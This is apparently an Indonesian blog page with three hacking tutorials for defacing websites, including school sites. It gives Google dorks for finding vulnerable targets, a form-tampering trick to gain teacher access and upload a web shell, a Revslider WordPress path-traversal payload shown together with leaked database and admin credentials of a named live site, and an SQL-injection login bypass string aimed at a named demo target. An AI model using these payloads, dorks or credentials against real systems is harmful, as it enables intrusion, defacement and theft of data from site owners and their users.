Saturday, 25 July 2015

Exploit Balitbang (EASY)

Kali ini saya akan meng-share tentang cara hack website sekolah (trik yang agak ngawur dan nggak mutu mungkin sih), tapi gak pa-palah. Pertama-tama anda persiapkan bahan untuk hack website sekolah. Eittsss ingat yang ditarget jangan sekolah sendiri nanti berakibat berbahaya :v hahaha! oke langsung chekidot gan! (Klik gambar untuk memperbesar size, kalo misalnya belum kelihatan)

Bahan:
1. Notepad (isi sesukamu)

Note: Siapkan Scriptnya dahulu



Langkah kerja:

1. Masukkan salah satu dork ke Google
Dork:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?saya memilih dork inurl:/html/siswa.php? . Nanti akan muncul web untuk ditebas.Pilih salah satu webnya
1). Masukan Dork di pencarian Google
2). Pilih salah satu website yang ingin di deface lalu exploit " /member/daftar.php "

 3). Klik kanan di kolom " Jenis Member ", kemudian pilih Inspect Element.
4). Ubah <option value="Tamu">Tamu</option> menjadi <option value="Guru">Tamu</option>

5). Isi semua pendaftaran, dan gunakan email yang vaild.

6). Cek email masuk yang telah didaftarkan tadi, lalu konfirmasi validasi.

7). Klik lanjutkan, dan Kita akan dibawa ke halaman administrasi. Login menggunakan Username dan Password yang telah didaftarkan tadi.

Cara tanam Shell :

1). Pada halaman admin, ada menu yang bertuliskan materi/belajar. Pilih menu materi atau belajar kemudian klik " Tambahkan Materi Ajar "

2). Isi materi terserah saja, isi file dengan shell Kita.

3). Setelah berhasil, klik " Download Materi Ajar "

4). Lalu klik file yang tadi Kita buat, kemudian klik " Download File "

Apabila muncul tampilan Shell berarti berhasil, apabila tampilan Shell tidak muncul ' Cobalah cari target lain '.
Sumber:http://elitecyberattacker.blogspot.com/











Posted by at No comments:

Exploit Revslider

Nih bro gua kasih tutorial hacking pake exploit revslider wordpress sebenarnya udah basi, tapi masih ada yang install revslider
jgn malas yahh dorking jgn males :)

langsung ajah

Buat exploit revslider nih dorknya bisa kalian kembangkan:
dork :  revslider.php "index of" site:**
           inurl:/revslider/rs-plugin/videojs/video-js.swf
           inurl:/revslider/rs-plugin/videojs/

bisa kalian kembangkan lohhh :) caranya, simple
"revslider.php "index of" site:**" ini site:** ganti bintangnya , menjadi Site:.net,Site:.com,site:.co.id pokonya sepinter pinternya eluh dah

Kalo enggak ini : revslider.php "Shop" site:.net


Lo bisa deface pake exploit ini bro :)

selanjutnya

lo translate ini kwokwokw :V


&amp; Exploit : /wp-admin/admin-ajax.php?action=revslider_show_image&amp;img=../wp-config.php
&amp; Test Site Download Config
&amp; http://www.epicfrenchbulldogs.com/wp-admin/admin-ajax.php…
&amp; Open File admin-ajax.php Cat Date ConfingeWP
&amp; http://www.epicfrenchbulldogs.com
&amp; [+] DB NAME : epicfrenchbulldogs_com_2
&amp; [+] DB USER : z28x4jyx
&amp; [+] DB PASS : ERQeQr7t
&amp; [+] DB host : mysql.epicfrenchbulldogs.com
&amp; Go Link MySQL &gt; mysql.epicfrenchbulldogs.com
&amp; Oh Sotp Firewall UserName:passwoed
&amp; Ok UserName:z28x4jyx
&amp; Ok PassWord:ERQeQr7t
" Enter Welcome PhpMyAdmin &gt;
&amp; Database Chek epicfrenchbulldogs_com_2
&amp; Chek wp_mcndqe_users And Browes
&amp; Options UserId
&amp; Edet 1 Admin User &gt; Pass: $P$BCd1RDROfvPGoK7ssEq.HiiAby0gbV/
&amp; User name:epicfrenchiesadmin
&amp; Post Pass Hash MD5 .&gt; 90fe6f261ee1314bcc2280ac0388207b " Ok
&amp; Login Panel Site : http://www.epicfrenchbulldogs.com/wp-login.php
&amp; UserName:epicfrenchiesadmin
&amp; Password:6340256
&amp; Welcome Panel Wordpress
&amp; the End .. Dr.SiLnT HilL &gt; .. Testing Exploit &gt; Lol'z Team F16 Hacker- قراصنه مصر ツF16Hacker

Salam defacer :)
Posted by at No comments:

Tutorial Bypass login

Assalamuallaikum sobat IDCA :)
Berhubung tadi pada minta tutorial deface, ya sudaaah saya kabulin dah. Pada artikel ini saya akan membahas mengenai "Bypass SQL Login" maksudnya gimana tuh?

Maksudnya.. dengan memanfaatkan eror pada sql website tersebut kita dapat login ke administrator web tersebut tanpa harus memasukan username dan password yang sudah dibuat admin. Singkatnya sih "bypass = bye bye password"

Oke langsung  saja kita masuk ke tutorialnya :

[#] Dork

inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/
[#] Langkah-langkah

1. Masukan salah satu dork diatas ke google, lalu pilih salah satu buat demo silahkan coba web ini

http://preprojects.com/hostfriendz/int/index.php
2. Jika sudah memilih target silahkan anda coba login dengan user pass ini :
user : ' or 1=1 limit 1 -- -+
pass : ' or 1=1 limit 1 -- -+




Nah jika berhasil ya sudah deh terserah mau kalian apakan :D
Simpel ya hhee dah cukup itu aja kok :D

Sekian tutorial dari saya thanks to Mr Xenophobic ^_^

SUMBER:http://indocyberarmy.blogspot.com/

lagi males ngetik, monggo
Posted by at No comments:
Subscribe to: Posts (Atom)